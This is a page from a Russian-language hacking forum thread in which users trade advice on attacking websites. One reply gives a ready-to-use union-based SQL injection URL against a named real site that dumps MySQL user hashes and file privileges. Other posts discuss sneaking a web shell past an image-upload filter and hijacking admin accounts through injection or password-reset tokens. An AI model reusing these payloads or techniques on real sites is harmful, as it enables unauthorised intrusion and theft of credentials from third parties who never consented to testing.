HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #161  
Старый 05.06.2015, 23:58
Merl0k
Guest
Сообщений: n/a
Провел на форуме:
5534

Репутация: 0
По умолчанию

Вопрос новичка по sql:

Извлек нужные названия столбцов, а при попытке вывести из них информацию таким способом: http://actachemscand.dk/author.php?a...72+limit+0,1-- выдает ошибку.
 
Ответить с цитированием

  #162  
Старый 06.06.2015, 00:10
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Название БД в которую обращаешься, должно быть в чистом виде

в вашем случае пример актуального запроса:

_ttp://actachemscand.dk/author.php?aid=1126+and+1=0+union+select+1,2,conca t_ws(0x3a,host,user,password,file_priv),4+from+mys ql.user+--+
 
Ответить с цитированием

  #163  
Старый 06.06.2015, 02:27
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Цитата:
Сообщение от Ravenous  
Ravenous said:

Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
данный плагин не работает на последних версиях FF, устанавливайте старую версию ( до 30, если не ошибаюсь), если хоитите пользоваться данным плагином и не искать альтернативу
 
Ответить с цитированием

  #164  
Старый 06.06.2015, 03:15
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

приучайте себя работать с burp suite или аналогами. они передают данные как есть, без urlencode
 
Ответить с цитированием

  #165  
Старый 06.06.2015, 12:10
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Filipp  
Filipp said:

Никто не подскажет, как можно залить шелл через самописный двигл, имеется спортанский набор: Загрузка файл JPG, PNG,GIF, и обычный HTML редактор. Пробовал пропихнуть шелл через картинку, ничего не получилось, картинка обрабатывается какой то php функцией, и не дает загружать любое другое расширение кроме выше описанных (Корректировка запроса не помогает, все равно срабатывает защита). Так же пробовал в гифку добовлять комментарий - результата 0. Так же в запросе я нашел местечко, куда сгружаются все заблокированные файлы, попробовал подставить, дало ошибку 403)) Так же заметил одну особенность, файлы загружается через SQL запрос. Может быть есть способы заливки шелла именно через HTML редактор, ведь туда что угодно впихнуть можно?
https://rdot.org/forum/showpost.php?p=1142&postcount=5

Цитата:
Сообщение от Mister_Bert0ni  
Mister_Bert0ni said:

Всем привет. Банальный вопрос:Если есть регистрация на сайте то значит сайт как то пишет регистрационные данные в базу.Но уязвимость sql в другом скрипте,например в index.php в параметре id.Так вот когда раскручиваешь скуль то оказывается что у current_user-а права только USAGE и подменить хэш админа он не может.Как так???? Получается что сайт записует данные от привелегирированого юзера??
вы про mysql?
 
Ответить с цитированием

  #166  
Старый 06.06.2015, 15:34
Mister_Bert0ni
Guest
Сообщений: n/a
Провел на форуме:
35015

Репутация: 57
По умолчанию

Цитата:
Сообщение от yarbabin  
Да
 
Ответить с цитированием

  #167  
Старый 06.06.2015, 15:42
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Mister_Bert0ni  
Mister_Bert0ni said:

Да
mysql различает запросы на модификацию и выборку. в select нельзя сделать update
 
Ответить с цитированием

  #168  
Старый 06.06.2015, 15:47
Filipp
Guest
Сообщений: n/a
Провел на форуме:
98300

Репутация: 31
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

mysql различает запросы на модификацию и выборку. в select нельзя сделать update
Нельзя, это факт. Но есть такая золотая штука как UNION. Можно закомментировать последующий запрос, и UNION'ом дать UPDATE. Такое возможно?
 
Ответить с цитированием

  #169  
Старый 06.06.2015, 15:48
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Filipp  
Filipp said:

Нельзя, это факт. Но есть такая золотая штука как UNION. Можно закомментировать последующий запрос, и UNION'ом дать UPDATE. Такое возможно?
нет. http://www.mysql.ru/docs/man/UNION.html
 
Ответить с цитированием

  #170  
Старый 06.06.2015, 22:42
Mister_Bert0ni
Guest
Сообщений: n/a
Провел на форуме:
35015

Репутация: 57
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

mysql различает запросы на модификацию и выборку. в select нельзя сделать update
если я првильно понял то при ввборке из базы я никак не смогу внедрить апдейт или инсерт?Смогу поменять пароль только если есть кнопка забыли пароль и я смогу вытянуть токен которыц отсылаеться на эмейл для сброса пароля?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ